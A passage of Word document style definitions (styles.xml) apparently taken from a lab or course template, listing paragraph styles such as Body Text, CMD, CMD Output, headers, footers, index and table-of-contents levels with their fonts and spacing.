    <w:next w:val="1148"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext w:val="true"/>
      <w:pBdr/>
      <w:spacing w:after="120" w:before="240"/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Sans" w:hAnsi="Liberation Sans" w:eastAsia="Noto Sans CJK SC" w:cs="FreeSans"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1148">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="1099"/>
    <w:link w:val="1135"/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="120" w:before="120" w:line="240" w:lineRule="auto"/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1149">
    <w:name w:val="List"/>
    <w:basedOn w:val="1148"/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="FreeSans"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1150">
    <w:name w:val="Caption"/>
    <w:basedOn w:val="1099"/>
    <w:qFormat/>
    <w:pPr>
      <w:suppressLineNumbers w:val="true"/>
      <w:pBdr/>
      <w:spacing w:after="120" w:before="120"/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="FreeSans"/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1151">
    <w:name w:val="Index"/>
    <w:basedOn w:val="1099"/>
    <w:qFormat/>
    <w:pPr>
      <w:suppressLineNumbers w:val="true"/>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="FreeSans"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1152" w:customStyle="1">
    <w:name w:val="Client Note"/>
    <w:basedOn w:val="1099"/>
    <w:next w:val="1099"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="0" w:before="60" w:line="240" w:lineRule="auto"/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:color w:val="ff0000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1153" w:customStyle="1">
    <w:name w:val="Answer Line L25"/>
    <w:basedOn w:val="1170"/>
    <w:next w:val="1170"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:i/>
      <w:color w:val="ffffff" w:themeColor="background1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1154" w:customStyle="1">
    <w:name w:val="Page Head"/>
    <w:basedOn w:val="1099"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr>
        <w:bottom w:val="single" w:color="000000" w:sz="18" w:space="1"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="clear" w:leader="none" w:pos="720"/>
        <w:tab w:val="right" w:leader="none" w:pos="10080"/>
      </w:tabs>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1155" w:customStyle="1">
    <w:name w:val="Answer Line L50"/>
    <w:basedOn w:val="1153"/>
    <w:next w:val="1169"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind w:firstLine="0" w:left="720"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1156">
    <w:name w:val="Header and Footer"/>
    <w:basedOn w:val="1099"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1157">
    <w:name w:val="Header"/>
    <w:basedOn w:val="1099"/>
    <w:link w:val="1112"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:tabs>
        <w:tab w:val="clear" w:leader="none" w:pos="720"/>
        <w:tab w:val="center" w:leader="none" w:pos="4680"/>
        <w:tab w:val="right" w:leader="none" w:pos="9360"/>
      </w:tabs>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1158">
    <w:name w:val="Footer"/>
    <w:basedOn w:val="1099"/>
    <w:link w:val="1113"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:tabs>
        <w:tab w:val="clear" w:leader="none" w:pos="720"/>
        <w:tab w:val="left" w:leader="none" w:pos="6570"/>
        <w:tab w:val="right" w:leader="none" w:pos="10080"/>
        <w:tab w:val="right" w:leader="none" w:pos="10800"/>
      </w:tabs>
      <w:spacing w:after="0" w:before="60" w:line="240" w:lineRule="auto"/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1159">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="1099"/>
    <w:link w:val="1114"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="0" w:before="60" w:line="240" w:lineRule="auto"/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1160" w:customStyle="1">
    <w:name w:val="Table Text"/>
    <w:basedOn w:val="1099"/>
    <w:link w:val="1115"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1161">
    <w:name w:val="Table Contents"/>
    <w:basedOn w:val="1099"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1162" w:customStyle="1">
    <w:name w:val="Table Heading"/>
    <w:basedOn w:val="1099"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext w:val="true"/>
      <w:pBdr/>
      <w:spacing w:after="120" w:before="120"/>
      <w:ind/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1163" w:customStyle="1">
    <w:name w:val="Bullet level 1"/>
    <w:basedOn w:val="1170"/>
    <w:qFormat/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1164" w:customStyle="1">
    <w:name w:val="Bullet level 2"/>
    <w:basedOn w:val="1170"/>
    <w:qFormat/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="4"/>
      </w:numPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind w:firstLine="0" w:left="1080"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1165" w:customStyle="1">
    <w:name w:val="Inst Note Red"/>
    <w:basedOn w:val="1099"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="ee0000"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1166" w:customStyle="1">
    <w:name w:val="Config Window"/>
    <w:basedOn w:val="1148"/>
    <w:next w:val="1170"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="0" w:before="0"/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:color w:val="ffffff" w:themeColor="background1"/>
      <w:sz w:val="6"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1167" w:customStyle="1">
    <w:name w:val="SubStep Alpha"/>
    <w:basedOn w:val="1170"/>
    <w:qFormat/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="3"/>
        <w:numId w:val="3"/>
      </w:numPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1168" w:customStyle="1">
    <w:name w:val="CMD"/>
    <w:basedOn w:val="1170"/>
    <w:link w:val="1136"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="60" w:before="60"/>
      <w:ind w:firstLine="0" w:left="720"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1169" w:customStyle="1">
    <w:name w:val="Body Text L50"/>
    <w:basedOn w:val="1099"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="120" w:before="120" w:line="240" w:lineRule="auto"/>
      <w:ind w:firstLine="0" w:left="720"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1170" w:customStyle="1">
    <w:name w:val="Body Text L25"/>
    <w:basedOn w:val="1099"/>
    <w:link w:val="1141"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="120" w:before="120" w:line="240" w:lineRule="auto"/>
      <w:ind w:firstLine="0" w:left="360"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1171" w:customStyle="1">
    <w:name w:val="Inst Note Red L50"/>
    <w:basedOn w:val="1165"/>
    <w:next w:val="1099"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="120" w:before="120"/>
      <w:ind w:firstLine="0" w:left="720"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1172" w:customStyle="1">
    <w:name w:val="DevConfigs"/>
    <w:basedOn w:val="1099"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="0" w:before="0"/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1173" w:customStyle="1">
    <w:name w:val="Visual"/>
    <w:basedOn w:val="1099"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="240" w:before="240"/>
      <w:ind/>
      <w:jc w:val="center"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1174">
    <w:name w:val="Document Map"/>
    <w:basedOn w:val="1099"/>
    <w:link w:val="1116"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="0" w:before="60" w:line="240" w:lineRule="auto"/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1175" w:customStyle="1">
    <w:name w:val="SubStep Num"/>
    <w:basedOn w:val="1170"/>
    <w:qFormat/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="4"/>
        <w:numId w:val="3"/>
      </w:numPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1176" w:customStyle="1">
    <w:name w:val="CMD Output"/>
    <w:basedOn w:val="1170"/>
    <w:link w:val="1142"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="60" w:before="60"/>
      <w:ind w:firstLine="0" w:left="720"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
      <w:sz w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1177" w:customStyle="1">
    <w:name w:val="Inst Note Red L25"/>
    <w:basedOn w:val="1170"/>
    <w:next w:val="1170"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="ee0000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1178" w:customStyle="1">
    <w:name w:val="Body Text L25 Bold"/>
    <w:basedOn w:val="1170"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1179">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="1099"/>
    <w:link w:val="1121"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:tabs>
        <w:tab w:val="clear" w:leader="none"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pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1180">
    <w:name w:val="annotation text"/>
    <w:basedOn w:val="1099"/>
    <w:link w:val="1123"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1181">
    <w:name w:val="annotation subject"/>
    <w:basedOn w:val="1180"/>
    <w:next w:val="1180"/>
    <w:link w:val="1124"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1182" w:customStyle="1">
    <w:name w:val="Reflection Q"/>
    <w:basedOn w:val="1170"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext w:val="true"/>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="2"/>
      </w:numPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1183">
    <w:name w:val="endnote text"/>
    <w:basedOn w:val="1099"/>
    <w:link w:val="1132"/>
    <w:semiHidden/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1184">
    <w:name w:val="footnote text"/>
    <w:basedOn w:val="1099"/>
    <w:link w:val="1133"/>
    <w:semiHidden/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1185">
    <w:name w:val="index 1"/>
    <w:basedOn w:val="1099"/>
    <w:next w:val="1099"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:hanging="240" w:left="240"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1186">
    <w:name w:val="index 2"/>
    <w:basedOn w:val="1099"/>
    <w:next w:val="1099"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:hanging="240" w:left="480"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1187">
    <w:name w:val="index 3"/>
    <w:basedOn w:val="1099"/>
    <w:next w:val="1099"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:hanging="240" w:left="720"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1188">
    <w:name w:val="index 4"/>
    <w:basedOn w:val="1099"/>
    <w:next w:val="1099"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:hanging="240" w:left="960"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1189">
    <w:name w:val="index 5"/>
    <w:basedOn w:val="1099"/>
    <w:next w:val="1099"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:hanging="240" w:left="1200"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1190">
    <w:name w:val="index 6"/>
    <w:basedOn w:val="1099"/>
    <w:next w:val="1099"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:hanging="240" w:left="1440"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1191">
    <w:name w:val="index 7"/>
    <w:basedOn w:val="1099"/>
    <w:next w:val="1099"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:hanging="240" w:left="1680"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1192">
    <w:name w:val="index 8"/>
    <w:basedOn w:val="1099"/>
    <w:next w:val="1099"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:hanging="240" w:left="1920"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1193">
    <w:name w:val="index 9"/>
    <w:basedOn w:val="1099"/>
    <w:next w:val="1099"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:hanging="240" w:left="2160"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1194">
    <w:name w:val="index heading"/>
    <w:basedOn w:val="1099"/>
    <w:next w:val="1185"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1195">
    <w:name w:val="macro"/>
    <w:link w:val="1134"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:pPr>
      <w:widowControl w:val="true"/>
      <w:pBdr/>
      <w:tabs>
        <w:tab w:val="left" w:leader="none" w:pos="480"/>
        <w:tab w:val="clear" w:leader="none" w:pos="72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bidi w:val="false"/>
      <w:spacing w:after="0" w:before="0"/>
      <w:ind/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Times New Roman" w:cs="Courier New"/>
      <w:color w:val="auto"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1196">
    <w:name w:val="table of authorities"/>
    <w:basedOn w:val="1099"/>
    <w:next w:val="1099"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:hanging="240" w:left="240"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1197">
    <w:name w:val="table of figures"/>
    <w:basedOn w:val="1099"/>
    <w:next w:val="1099"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:hanging="480" w:left="480"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1198">
    <w:name w:val="toa heading"/>
    <w:basedOn w:val="1099"/>
    <w:next w:val="1099"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="0" w:before="120" w:line="240" w:lineRule="auto"/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1199">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="1099"/>
    <w:next w:val="1099"/>
    <w:semiHidden/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1200">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="1099"/>
    <w:next w:val="1099"/>
    <w:semiHidden/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:firstLine="0" w:left="240"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1201">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="1099"/>
    <w:next w:val="1099"/>
    <w:semiHidden/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:firstLine="0" w:left="480"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1202">
    <w:name w:val="toc 4"/>
    <w:basedOn w:val="1099"/>
    <w:next w:val="1099"/>
    <w:semiHidden/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:firstLine="0" w:left="720"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1203">
    <w:name w:val="toc 5"/>
    <w:basedOn w:val="1099"/>
    <w:next w:val="1099"/>
    <w:semiHidden/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:firstLine="0" w:left="960"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1204">
    <w:name w:val="toc 6"/>
    <w:basedOn w:val="1099"/>
    <w:next w:val="1099"/>
    <w:semiHidden/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:firstLine="0" w:left="1200"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1205">
    <w:name w:val="toc 7"/>
    <w:basedOn w:val="1099"/>
    <w:next w:val="1099"/>
    <w:semiHidden/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:firstLine="0" w:left="1440"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1206">
    <w:name w:val="toc 8"/>
    <w:basedOn w:val="1099"/>
    <w:next w:val="1099"/>
    <w:semiHidden/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:firstLine="0" w:left="1680"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1207">
    <w:name w:val="toc 9"/>
    <w:basedOn w:val="1099"/>
    <w:next w:val="1099"/>
    <w:semiHidden/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:firstLine="0" w:left="1920"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1208" w:customStyle="1">
    <w:name w:val="Colorful Shading - Accent 11"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:pPr>
      <w:widowControl w:val="true"/>
      <w:pBdr/>
      <w:bidi w:val="false"/>
      <w:spacing w:after="0" w:before="0"/>
      <w:ind/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Times New Roman" w:cs="Arial"/>
      <w:color w:val="auto"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1209" w:customStyle="1">
